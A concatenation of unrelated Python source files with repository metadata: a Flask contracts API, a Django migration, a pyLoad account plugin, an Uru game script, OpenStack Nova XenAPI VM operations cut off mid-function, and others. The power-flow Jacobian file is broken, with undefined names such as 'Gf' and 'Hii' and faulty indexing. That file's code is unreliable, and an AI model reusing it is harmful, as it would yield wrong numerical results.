contratos_data = db.session.query(Contrato)
contratos_data = self.order(contratos_data)
contratos_data = self.filter(contratos_data)
headers = {
# Add 'Access-Control-Expose-Headers' header here is a workaround
# until Flask-Restful adds support to it.
'Access-Control-Expose-Headers': 'X-Total-Count',
'X-Total-Count': contratos_data.count()
}
contratos_data = self.paginate(contratos_data)
return contratos_data.all(), 200, headers
contratos_api.add_resource(ContratoListApi, '/contrato/list')
class ContratoAggregateApi(ContratoApi):
def get(self):
args = contratos_list_parser.parse_args()
group_by = args['group_by'].split(',')
group_by_fields = []
# Always return a count
query_args = [func.count(Contrato.id).label('count')]
keys = []
temporary_keys = []
partial_fields = []
# Tuples with SQLAlchemy function and args to get parts of values.
# This allows to group by years or months for example.
parts = {
'year': (lambda field: [func.extract('year', field)],
lambda values: list(values)[0]),
'month': (lambda field: [func.extract('year', field), func.extract('month', field)],
lambda values: '-'.join([format(v, '02') for v in values])),
'day': (lambda field: [func.extract('year', field), func.extract('month', field), func.extract('day', field)],
lambda values: '-'.join([format(v, '02') for v in values])),
}
for field_name in group_by:
part = None
if field_name.endswith(tuple(map(lambda a: '__{}'.format(a), parts.keys()))):
# User asked to group using only part of value.
# Get the original field name and which part we should use.
# "?group_by=data_publicacao__year" results in
# field_name = 'data_publicacao'
# part = 'year'
field_name, part = field_name.split('__', 1)
if field_name in contratos_fields:
group_by_field = [getattr(Contrato, field_name)]
if part:
# Apply the "part" function
group_by_field = parts[part][0](group_by_field[0])
temporary_keys.extend(['{}__{}'.format(field_name, i) for i in range(len(group_by_field))])
partial_fields.append({
'field_name': field_name,
'count': len(group_by_field),
'part_name': part,
})
else:
keys.append(field_name)
temporary_keys.append(field_name)
group_by_fields.extend(group_by_field)
query_args.extend(group_by_field)
query_args.append(func.sum(Contrato.valor).label('valor'))
keys.append('valor')
temporary_keys.append('valor')
contratos_data = db.session.query(*query_args)
if group_by_fields:
contratos_data = contratos_data.group_by(*group_by_fields)
contratos_data = self.order(contratos_data)
contratos_data = self.filter(contratos_data)
headers = {
# Add 'Access-Control-Expose-Headers' header here is a workaround
# until Flask-Restful adds support to it.
'Access-Control-Expose-Headers': 'X-Total-Count',
'X-Total-Count': contratos_data.count()
}
contratos_data = self.paginate(contratos_data)
# Create the dictionary used to marshal
fields_ = {'count': fields.Integer()}
fields_.update({key: contratos_fields.get(key, fields.String()) for key in keys})
# Create a list of dictionaries
result = map(lambda a: dict(zip(['count'] + temporary_keys, a)), contratos_data.all())
# Set partial dates type to string
for f in partial_fields:
fields_[f['field_name']] = fields.String()
for item in result:
item[f['field_name']] = parts[f['part_name']][1]((item.pop('{}__{}'.format(f['field_name'], i)) for i in range(f['count'])))
return restful.marshal(result, fields_), 200, headers
contratos_api.add_resource(ContratoAggregateApi, '/contrato/aggregate')
@contratos.route('/contrato/<contract_id>')
def show_contract(contract_id):
try:
contrato = db.session.query(Contrato).filter(Contrato.numero == contract_id).one()
return render_template('contrato.html', contrato=contrato)
except TemplateNotFound:
abort(404)
@contratos.route('/contrato/cnpj/<cnpj>')
def contracts_for_cnpj(cnpj):
cnpj = "{}.{}.{}/{}-{}".format( cnpj[0:2], cnpj[2:5], cnpj[5:8], cnpj[8:12], cnpj[12:14])
# contratos = db.session.query(Contrato).filter(Contrato.cnpj == cnpj).all()
page = int(request.args.get('page', 1))
per_page_num = 10
try:
contratos_query = db.session.query(Contrato).filter(Contrato.cnpj == cnpj)
contratos = contratos_query.offset((page-1)*per_page_num).limit(per_page_num).all()
count = contratos_query.count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('contratos-cnpj.html', contratos=contratos, pagination=pagination, count=count, filter_info=u"Fornecedor", filter_value=cnpj)
except TemplateNotFound:
abort(404)
@contratos.route('/contrato/orgao/<orgao>')
def contracts_for_orgao(orgao):
page = int(request.args.get('page', 1))
per_page_num = 10
try:
contratos_query = db.session.query(Contrato).filter(Contrato.orgao == orgao)
contratos = contratos_query.offset((page-1)*per_page_num).limit(per_page_num).all()
count = contratos_query.count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('contratos-orgao.html', contratos=contratos, pagination=pagination, count=count, filter_info=u"Orgão", filter_value=orgao)
except TemplateNotFound:
abort(404)
@contratos.route('/contrato/modalidade/<modalidade>')
def contracts_for_modalidade(modalidade):
page = int(request.args.get('page', 1))
per_page_num = 10
try:
contratos_query = db.session.query(Contrato).filter(Contrato.modalidade == modalidade)
contratos = contratos_query.offset((page-1)*per_page_num).limit(per_page_num).all()
count = contratos_query.count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('contratos-orgao.html', contratos=contratos, pagination=pagination, count=count, filter_info="Modalidade", filter_value=modalidade)
except TemplateNotFound:
abort(404)
@contratos.route('/contrato/evento/<evento>')
def contracts_for_evento(evento):
page = int(request.args.get('page', 1))
per_page_num = 10
try:
contratos_query = db.session.query(Contrato).filter(Contrato.evento == evento)
contratos = contratos_query.offset((page-1)*per_page_num).limit(per_page_num).all()
count = contratos_query.count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('contratos-orgao.html', contratos=contratos, pagination=pagination, count=count, filter_info="Evento", filter_value=evento)
except TemplateNotFound:
abort(404)
@contratos.route('/contratos')
def all_contracts():
page = int(request.args.get('page', 1))
per_page_num = 40
try:
contratos = db.session.query(Contrato).offset((page-1)*per_page_num).limit(per_page_num).all()
count = db.session.query(Contrato).count()
pagination = Pagination(page=page, per_page=per_page_num, total=count, found=count, bs_version=3, search=True, record_name='contratos')
return render_template('todos-contratos.html', contratos=contratos, pagination=pagination, count=count)
except TemplateNotFound:
abort(404)
|
LuizArmesto/gastos_abertos
|
gastosabertos/contratos/views.py
|
Python
|
agpl-3.0
| 13,828
| 0.005496
|
# Copyright (c) 2011 CSIRO
# Australia Telescope National Facility (ATNF)
# Commonwealth Scientific and Industrial Research Organisation (CSIRO)
# PO Box 76, Epping NSW 1710, Australia
# atnf-enquiries@csiro.au
#
# This file is part of the ASKAP software distribution.
#
# The ASKAP software distribution is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the License
# or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
#
|
ATNF/askapsdp
|
Code/Base/py-accessor/current/askap/accessors/__init__.py
|
Python
|
gpl-2.0
| 991
| 0
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-05-09 13:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_tablefield_allow_null'),
]
operations = [
migrations.AddField(
model_name='tablefield',
name='inner_type',
field=models.CharField(default='', max_length=250),
),
]
|
lealhugui/schema-analyser
|
app/server/api/migrations/0003_tablefield_inner_type.py
|
Python
|
mit
| 467
| 0
|
# -*- coding: utf-8 -*-
from module.plugins.internal.XFSPAccount import XFSPAccount
class RyushareCom(XFSPAccount):
__name__ = "RyushareCom"
__version__ = "0.03"
__type__ = "account"
__description__ = """ryushare.com account plugin"""
__author_name__ = ("zoidberg", "trance4us")
__author_mail__ = ("zoidberg@mujmail.cz", "")
MAIN_PAGE = "http://ryushare.com/"
def login(self, user, data, req):
req.lastURL = "http://ryushare.com/login.python"
html = req.load("http://ryushare.com/login.python",
post={"login": user, "password": data["password"], "op": "login"})
if 'Incorrect Login or Password' in html or '>Error<' in html:
self.wrongPassword()
|
chaosmaker/pyload
|
module/plugins/accounts/RyushareCom.py
|
Python
|
gpl-3.0
| 742
| 0.001348
|
from numpy import matrix
# integer Size; integer nPQ, Matrix G; Matrix B; Array U
def JacMat(Size, nPQ, G, B, U):
# Method Of Every Entry Of Jacbean Matrix
f = U.real
e = U.imag
JacMat = zeros(Size, Size)
def Hij(B, G, e, f):
return -B*e+Gf
def Nij(B, G, e, f):
return G*e+Bf
def Jij(B, G, e, f):
return -B*f-G*e
def Lij(B, G, e, f):
return -B*e+Gf
def Rij():
return 0
def Sij():
return 0
def Aii(GM, BM, eA, fA, i):
aii = 0
for j in range(1, len(eA)):
aii = aii + G[i][j]*e[j]-B[i][j]*f[j]
return aii
def Bii(GM, BM, eA, fA, i):
bii = 0
for j in range(1, len(eA)):
bii = bii + G[i][j]*f[j]+B[i][j]*e[j]
return bii
if isSquareM(B)==True and isSquareM(G)==True and len(B) == len(G) == G.dim == B.dim:
# Build Jacbean Matrix
for m in range(0, Size, 2): #H
for n in range(0, Size, 2):
if m==n:
JacMat[m][n] = Hii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Hij(B[m][n], G[m][n], e[m], f[m])
for m in range(0, Size, 2): #N
for n in range(1, Size, 2):
if m==n:
JacMat[m][n] = Nii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Nij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #J
for n in range(0, nPQ*2, 2):
if m==n:
JacMat[m][n] = Jii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Jij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #L
for n in range(1, nPQ*2, 2):
if m==n:
JacMat[m][n] = Lii(B[m][m], G[m][m], e[m], f[m])
else:
JacMat[m][n] = Lij(B[m][n], G[m][n], e[m], f[m])
for m in range(1, Size, 2): #R
for n in range(1, nPQ*2, 2):
if m==n:
JacMat[m][n] = Rii(f[m])
else:
JacMat[m][n] = Rij()
for m in range(1, Size, 2): #S
for n in range(nPQ*2+1, Size, 2):
if m==n:
JacMat[m][n] = Sii(e[m])
else:
JacMat[m][n] = Sij()
print JacMat
return JacMat
else:
print "Parameter Unmatched"
return False
|
bitmingw/hexomega
|
assets/HOJacMat.py
|
Python
|
mit
| 2,566
| 0.011302
|
"""
WSGI config for batfinancas project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "batfinancas.settings")
application = get_wsgi_application()
|
rafaelnsantos/batfinancas
|
batfinancas/wsgi.py
|
Python
|
mit
| 399
| 0
|
# -*- coding: utf-8 -*-
""" *==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email legal@cyan.com
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==* """
"""
Module: xPodBahroSymbol
Age: Global
Date: January 2007
Author: Derek Odell
"""
from Plasma import *
from PlasmaTypes import *
import random
# define the attributes that will be entered in max
respBahroSymbol = ptAttribResponder(1, "resp: Bahro Symbol", ["beginning","middle","end"], netForce=1)
SymbolAppears = ptAttribInt(2, "Frame the Symbol Appears", 226, (0,5000))
DayFrameSize = ptAttribInt(3, "Frames in One Day", 2000, (0,5000))
animMasterDayLight = ptAttribAnimation(4, "Master Animation Object")
respSFX = ptAttribResponder(5, "resp: Symbol SFX", ["stop","play"],netForce = 1)
# define globals
kDayLengthInSeconds = 56585.0
# The max file "full day" animation in Payiferen is 2000 frames
# or 66.666 (2000 / 30) seconds long. We need it to last 56585
# seconds which means the animation needs to be played back at
# 0.035345 (2000 / 56585) frames per second. Which means animation
# speed needs to be set to 0.0011781666 ((2000 / 56585) / 30)
kDayAnimationSpeed = (DayFrameSize.value / kDayLengthInSeconds) / 30.0
# The Bahro symbol is set to trigger on frame 226 of 2000 which
# is 11.3% (226 / 2000) into the day. 11.3% into a 56585 second
# day is 6394.105 seconds (56585 * 0.113). That gives us our base
# point for every other age that needs the Bahro symbol.
kTimeWhenSymbolAppears = kDayLengthInSeconds * (float(SymbolAppears.value) / float(DayFrameSize.value))
#====================================
class xPodBahroSymbol(ptResponder):
###########################
def __init__(self):
ptResponder.__init__(self)
self.id = 5240
version = 1
self.version = version
print "__init__xPodBahroSymbol v.", version,".0"
random.seed()
###########################
def OnServerInitComplete(self):
self.ISetTimers()
respSFX.run(self.key, state="stop")
if type(animMasterDayLight.value) != type(None):
timeIntoMasterAnim = PtGetAgeTimeOfDayPercent() * (DayFrameSize.value / 30.0)
print "xPodBahroSymbol.OnServerInitComplete: Master anim is skipping to %f seconds and playing at %f speed" % (timeIntoMasterAnim, kDayAnimationSpeed)
animMasterDayLight.animation.skipToTime(timeIntoMasterAnim)
animMasterDayLight.animation.speed(kDayAnimationSpeed)
animMasterDayLight.animation.resume()
###########################
def OnNotify(self,state,id,events):
print "xPodBahroSymbol.OnNotify: state=%f id=%d events=" % (state,id),events
if id == respBahroSymbol.id:
PtAtTimeCallback(self.key, 32, 3)
###########################
def OnTimer(self,TimerID):
print "xPodBahroSymbol.OnTimer: callback id=%d" % (TimerID)
if self.sceneobject.isLocallyOwned():
if TimerID == 1:
respBahroSymbol.run(self.key, state="beginning")
respSFX.run(self.key, state="play")
elif TimerID == 2:
self.ISetTimers()
elif TimerID == 3:
respBahroSymbol.run(self.key, state="end")
respSFX.run(self.key, state="stop")
###########################
def ISetTimers(self):
beginningOfToday = PtGetDniTime() - int(PtGetAgeTimeOfDayPercent() * kDayLengthInSeconds)
timeWhenSymbolAppearsToday = beginningOfToday + kTimeWhenSymbolAppears
if timeWhenSymbolAppearsToday > PtGetDniTime():
timeTillSymbolAppears = timeWhenSymbolAppearsToday - PtGetDniTime()
PtAtTimeCallback(self.key, timeTillSymbolAppears, 1)
print "xGlobalDoor.key: %d%s" % (random.randint(0,100), hex(int(timeTillSymbolAppears + 1234)))
else:
print "xPodBahroSymbol: You missed the symbol for today."
timeLeftToday = kDayLengthInSeconds - int(PtGetAgeTimeOfDayPercent() * kDayLengthInSeconds)
timeLeftToday += 1 # because we want it to go off right AFTER the day flips
PtAtTimeCallback(self.key, timeLeftToday, 2)
print "xPodBahroSymbol: Tomorrow starts in %d seconds" % (timeLeftToday)
###########################
def OnBackdoorMsg(self, target, param):
if target == "bahro":
if self.sceneobject.isLocallyOwned():
print "xPodBahroSymbol.OnBackdoorMsg: Work!"
if param == "appear":
PtAtTimeCallback(self.key, 1, 1)
|
zrax/moul-scripts
|
Python/xPodBahroSymbol.py
|
Python
|
gpl-3.0
| 6,228
| 0.006744
|
#!/bin/env python
import npyscreen
class MainFm(npyscreen.Form):
def create(self):
self.mb = self.add(npyscreen.MonthBox,
use_datetime = True)
class TestApp(npyscreen.NPSAppManaged):
def onStart(self):
self.addForm("MAIN", MainFm)
if __name__ == "__main__":
A = TestApp()
A.run()
|
tescalada/npyscreen-restructure
|
tests/testMonthbox.py
|
Python
|
bsd-2-clause
| 337
| 0.011869
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright 2010 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for VM-related functions (spawn, reboot, etc).
"""
import functools
import itertools
import time
from eventlet import greenthread
import netaddr
from oslo.config import cfg
from nova import block_device
from nova.compute import api as compute
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova.compute import vm_states
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova.openstack.common import excutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova import utils
from nova.virt import configdrive
from nova.virt import driver as virt_driver
from nova.virt import firewall
from nova.virt.xenapi import agent as xapi_agent
from nova.virt.xenapi import pool_states
from nova.virt.xenapi import vm_utils
from nova.virt.xenapi import volume_utils
from nova.virt.xenapi import volumeops
LOG = logging.getLogger(__name__)
xenapi_vmops_opts = [
cfg.IntOpt('xenapi_running_timeout',
default=60,
help='number of seconds to wait for instance '
'to go to running state'),
cfg.StrOpt('xenapi_vif_driver',
default='nova.virt.xenapi.vif.XenAPIBridgeDriver',
help='The XenAPI VIF driver using XenServer Network APIs.'),
cfg.StrOpt('xenapi_image_upload_handler',
default='nova.virt.xenapi.imageupload.glance.GlanceStore',
help='Object Store Driver used to handle image uploads.'),
cfg.BoolOpt('xenapi_generate_swap',
default=False,
help='Whether to generate swap '
'(False means fetching it from OVA)'),
cfg.StrOpt('image_activation_file',
default=None,
help=_('JSON file containing image activation configuration')),
cfg.StrOpt('provider',
default='Rackspace',
help=_('Set the provider name. Defaults to "Rackspace".')),
cfg.StrOpt('region',
default=None,
help=_('Region compute host is in')),
cfg.StrOpt('ip_whitelist_file',
default=None,
help=_('File containing a list of IP addresses to whitelist '
'on managed hosts')),
cfg.StrOpt('max_snapshot_size',
default=0,
help=_('Maximum allowed number of bytes (before compression)'
' that may be uploaded during an instance snapshot.'
' A value of zero means there is no limit.')),
]
CONF = cfg.CONF
CONF.register_opts(xenapi_vmops_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
firewall.__name__,
firewall.IptablesFirewallDriver.__name__)
RESIZE_TOTAL_STEPS = 5
DEVICE_ROOT = '0'
DEVICE_RESCUE = '1'
DEVICE_SWAP = '2'
DEVICE_CONFIGDRIVE = '3'
# Note(johngarbutt) HVM guests only support four devices
# until the PV tools activate, when others before available
# As such, ephemeral disk only available once PV tools load
DEVICE_EPHEMERAL = '4'
# Note(johngarbutt) Currently don't support ISO boot during rescue
# and we must have the ISO visible before the PV drivers start
DEVICE_CD = '1'
class RaxImageActivationConfig(object):
"""Manage RAX image license activation config state."""
def __init__(self):
self._cache = {}
if CONF.image_activation_file:
self._file_path = CONF.find_file(CONF.image_activation_file)
self.reload()
def reload(self):
"""(Re)load config from JSON file
The file is a dict mapping each activation profile idsto
a configuration value.
E.x. file:
{
"1-2-3-4-5": "useful_config_value"
}
"""
def _reload(data):
self._config = jsonutils.loads(data)
utils.read_cached_file(self._file_path, self._cache,
reload_func=_reload)
def get(self, profile_name):
"""Get config values for the given profile name."""
if not CONF.image_activation_file:
return None
self.reload()
return self._config.get(profile_name)
def cmp_version(a, b):
"""Compare two version strings (eg 0.0.1.10 > 0.0.1.9)."""
a = a.split('.')
b = b.split('.')
# Compare each individual portion of both version strings
for va, vb in zip(a, b):
ret = int(va) - int(vb)
if ret:
return ret
# Fallback to comparing length last
return len(a) - len(b)
def make_step_decorator(context, instance, instance_update):
"""Factory to create a decorator that records instance progress as a series
of discrete steps.
Each time the decorator is invoked we bump the total-step-count, so after::
@step
def step1():
...
@step
def step2():
...
we have a total-step-count of 2.
Each time the step-function (not the step-decorator!) is invoked, we bump
the current-step-count by 1, so after::
step1()
the current-step-count would be 1 giving a progress of ``1 / 2 *
100`` or 50%.
"""
step_info = dict(total=0, current=0)
def bump_progress():
step_info['current'] += 1
progress = round(float(step_info['current']) /
step_info['total'] * 100)
LOG.debug(_("Updating progress to %(progress)d"), locals(),
instance=instance)
instance_update(context, instance['uuid'], {'progress': progress})
def step_decorator(f):
step_info['total'] += 1
@functools.wraps(f)
def inner(*args, **kwargs):
rv = f(*args, **kwargs)
bump_progress()
return rv
return inner
return step_decorator
class VMOps(object):
"""
Management class for VM-related tasks
"""
def __init__(self, session, virtapi):
self.compute_api = compute.API()
self._session = session
self._virtapi = virtapi
self._volumeops = volumeops.VolumeOps(self._session)
self.firewall_driver = firewall.load_driver(
DEFAULT_FIREWALL_DRIVER,
self._virtapi,
xenapi_session=self._session)
vif_impl = importutils.import_class(CONF.xenapi_vif_driver)
self.vif_driver = vif_impl(xenapi_session=self._session)
self.default_root_dev = '/dev/sda'
# configs for image license activation:
self._rax_image_activation_config = RaxImageActivationConfig()
msg = _("Importing image upload handler: %s")
LOG.debug(msg % CONF.xenapi_image_upload_handler)
self.image_upload_handler = importutils.import_object(
CONF.xenapi_image_upload_handler)
@property
def agent_enabled(self):
return not CONF.xenapi_disable_agent
def _get_agent(self, instance, vm_ref):
if self.agent_enabled:
return xapi_agent.XenAPIBasedAgent(self._session, self._virtapi,
instance, vm_ref)
raise exception.NovaException(_("Error: Agent is disabled"))
def list_instances(self):
"""List VM instances."""
# TODO(justinsb): Should we just always use the details method?
# Seems to be the same number of API calls..
name_labels = []
for vm_ref, vm_rec in vm_utils.list_vms(self._session):
name_labels.append(vm_rec["name_label"])
return name_labels
def list_instance_uuids(self):
"""Get the list of nova instance uuids for VMs found on the
hypervisor.
"""
nova_uuids = []
for vm_ref, vm_rec in vm_utils.list_vms(self._session):
other_config = vm_rec['other_config']
nova_uuid = other_config.get('nova_uuid')
if nova_uuid:
nova_uuids.append(nova_uuid)
return nova_uuids
def confirm_migration(self, migration, instance, network_info):
self._destroy_orig_vm(instance, network_info)
def _destroy_orig_vm(self, instance, network_info):
name_label = self._get_orig_vm_name_label(instance)
vm_ref = vm_utils.lookup(self._session, name_label)
return self._destroy(instance, vm_ref, network_info=network_info)
def _attach_mapped_block_devices(self, instance, block_device_info):
# We are attaching these volumes before start (no hotplugging)
# because some guests (windows) don't load PV drivers quickly
block_device_mapping = virt_driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
mount_device = vol['mount_device'].rpartition("/")[2]
self._volumeops.attach_volume(connection_info,
instance['name'],
mount_device,
hotplug=False)
def finish_revert_migration(self, instance, block_device_info=None):
self._restore_orig_vm_and_cleanup_orphan(instance, block_device_info)
def _restore_orig_vm_and_cleanup_orphan(self, instance, block_device_info):
# NOTE(sirp): the original vm was suffixed with '-orig'; find it using
# the old suffix, remove the suffix, then power it back on.
name_label = self._get_orig_vm_name_label(instance)
vm_ref = vm_utils.lookup(self._session, name_label)
# NOTE(danms): if we're reverting migration in the failure case,
# make sure we don't have a conflicting vm still running here,
# as might be the case in a failed migrate-to-same-host situation
new_ref = vm_utils.lookup(self._session, instance['name'])
if vm_ref is not None:
if new_ref is not None:
self._destroy(instance, new_ref)
# Remove the '-orig' suffix (which was added in case the
# resized VM ends up on the source host, common during
# testing)
name_label = instance['name']
vm_utils.set_vm_name_label(self._session, vm_ref, name_label)
self._attach_mapped_block_devices(instance, block_device_info)
elif new_ref is not None:
# We crashed before the -orig backup was made
vm_ref = new_ref
self._start(instance, vm_ref)
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None):
root_vdi = vm_utils.move_disks(self._session, instance, disk_info)
if resize_instance:
self._resize_instance(instance, root_vdi)
# Check if kernel and ramdisk are external
kernel_file = None
ramdisk_file = None
name_label = instance['name']
if instance['kernel_id']:
vdis = vm_utils.create_kernel_image(context, self._session,
instance, name_label, instance['kernel_id'],
vm_utils.ImageType.KERNEL)
kernel_file = vdis['kernel'].get('file')
if instance['ramdisk_id']:
vdis = vm_utils.create_kernel_image(context, self._session,
instance, name_label, instance['ramdisk_id'],
vm_utils.ImageType.RAMDISK)
ramdisk_file = vdis['ramdisk'].get('file')
disk_image_type = vm_utils.determine_disk_image_type(image_meta)
vm_ref = self._create_vm(context, instance, instance['name'],
{'root': root_vdi},
disk_image_type, network_info, kernel_file,
ramdisk_file)
self._attach_mapped_block_devices(instance, block_device_info)
# 5. Start VM
self._start(instance, vm_ref=vm_ref)
self._update_instance_progress(context, instance,
step=5,
total_steps=RESIZE_TOTAL_STEPS)
def _start(self, instance, vm_ref=None, bad_volumes_callback=None):
"""Power on a VM instance."""
vm_ref = vm_ref or self._get_vm_opaque_ref(instance)
LOG.debug(_("Starting instance"), instance=instance)
# Attached volumes that have become non-responsive will prevent a VM
# from starting, so scan for these before attempting to start
#
# In order to make sure this detach is consistent (virt, BDM, cinder),
# we only detach in the virt-layer if a callback is provided.
if bad_volumes_callback:
bad_devices = self._volumeops.find_bad_volumes(vm_ref)
for device_name in bad_devices:
self._volumeops.detach_volume(
None, instance['name'], device_name)
self._session.call_xenapi('VM.start_on', vm_ref,
self._session.get_xenapi_host(),
False, False)
# Allow higher-layers a chance to detach bad-volumes as well (in order
# to cleanup BDM entries and detach in Cinder)
if bad_volumes_callback and bad_devices:
bad_volumes_callback(bad_devices)
def _create_disks(self, context, instance, name_label, disk_image_type,
image_meta, block_device_info=None):
vdis = vm_utils.get_vdis_for_instance(context, self._session,
instance, name_label,
image_meta.get('id'),
disk_image_type,
block_device_info=block_device_info)
# Just get the VDI ref once
for vdi in vdis.itervalues():
vdi['ref'] = self._session.call_xenapi('VDI.get_by_uuid',
vdi['uuid'])
root_vdi = vdis.get('root')
if root_vdi:
self._resize_instance(instance, root_vdi)
return vdis
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None,
name_label=None, rescue=False):
if name_label is None:
name_label = instance['name']
step = make_step_decorator(context, instance,
self._virtapi.instance_update)
@step
def determine_disk_image_type_step(undo_mgr):
return vm_utils.determine_disk_image_type(image_meta)
@step
def create_disks_step(undo_mgr, disk_image_type, image_meta):
vdis = self._create_disks(context, instance, name_label,
disk_image_type, image_meta,
block_device_info=block_device_info)
def undo_create_disks():
vdi_refs = [vdi['ref'] for vdi in vdis.values()
if not vdi.get('osvol')]
vm_utils.safe_destroy_vdis(self._session, vdi_refs)
undo_mgr.undo_with(undo_create_disks)
return vdis
@step
def create_kernel_ramdisk_step(undo_mgr):
kernel_file = None
ramdisk_file = None
if instance['kernel_id']:
vdis = vm_utils.create_kernel_image(context, self._session,
instance, name_label, instance['kernel_id'],
vm_utils.ImageType.KERNEL)
kernel_file = vdis['kernel'].get('file')
if instance['ramdisk_id']:
vdis = vm_utils.create_kernel_image(context, self._session,
instance, name_label, instance['ramdisk_id'],
vm_utils.ImageType.RAMDISK)
ramdisk_file = vdis['ramdisk'].get('file')
def undo_create_kernel_ramdisk():
if kernel_file or ramdisk_file:
LOG.debug(_("Removing kernel/ramdisk files from dom0"),
instance=instance)
vm_utils.destroy_kernel_ramdisk(
self._session, kernel_file, ramdisk_file)
undo_mgr.undo_with(undo_create_kernel_ramdisk)
return kernel_file, ramdisk_file
@step
def create_vm_record_step(undo_mgr, vdis, disk_image_type,
kernel_file, ramdisk_file):
vm_ref = self._create_vm_record(context, instance, name_label,
vdis, disk_image_type, kernel_file, ramdisk_file)
def undo_create_vm():
self._destroy(instance, vm_ref, network_info=network_info)
undo_mgr.undo_with(undo_create_vm)
return vm_ref
@step
def attach_disks_step(undo_mgr, vm_ref, vdis, disk_image_type):
self._attach_disks(instance, vm_ref, name_label, vdis,
disk_image_type, admin_password,
injected_files)
if rescue:
# NOTE(johannes): Attach root disk to rescue VM now, before
# booting the VM, since we can't hotplug block devices
# on non-PV guests
@step
def attach_root_disk_step(undo_mgr, vm_ref):
orig_vm_ref = vm_utils.lookup(self._session, instance['name'])
vdi_ref = self._find_root_vdi_ref(orig_vm_ref)
vm_utils.create_vbd(self._session, vm_ref, vdi_ref,
DEVICE_RESCUE, bootable=False)
@step
def setup_network_step(undo_mgr, vm_ref, vdis):
self._setup_vm_networking(instance, vm_ref, vdis, network_info,
rescue)
@step
def inject_metadata_step(undo_mgr, vm_ref):
self.inject_instance_metadata(instance, vm_ref)
@step
def inject_provider_data_step(undo_mgr, vm_ref):
self.inject_provider_data(instance, vm_ref, context)
@step
def prepare_security_group_filters_step(undo_mgr):
try:
self.firewall_driver.setup_basic_filtering(
instance, network_info)
except NotImplementedError:
# NOTE(salvatore-orlando): setup_basic_filtering might be
# empty or not implemented at all, as basic filter could
# be implemented with VIF rules created by xapi plugin
pass
self.firewall_driver.prepare_instance_filter(instance,
network_info)
@step
def boot_instance_step(undo_mgr, vm_ref):
self._boot_new_instance(instance, vm_ref, injected_files,
admin_password, image_meta)
@step
def apply_security_group_filters_step(undo_mgr):
self.firewall_driver.apply_instance_filter(instance, network_info)
@step
def bdev_set_default_root(undo_mgr):
if block_device_info:
LOG.debug(_("Block device information present: %s")
% block_device_info, instance=instance)
if block_device_info and not block_device_info['root_device_name']:
block_device_info['root_device_name'] = self.default_root_dev
undo_mgr = utils.UndoManager()
try:
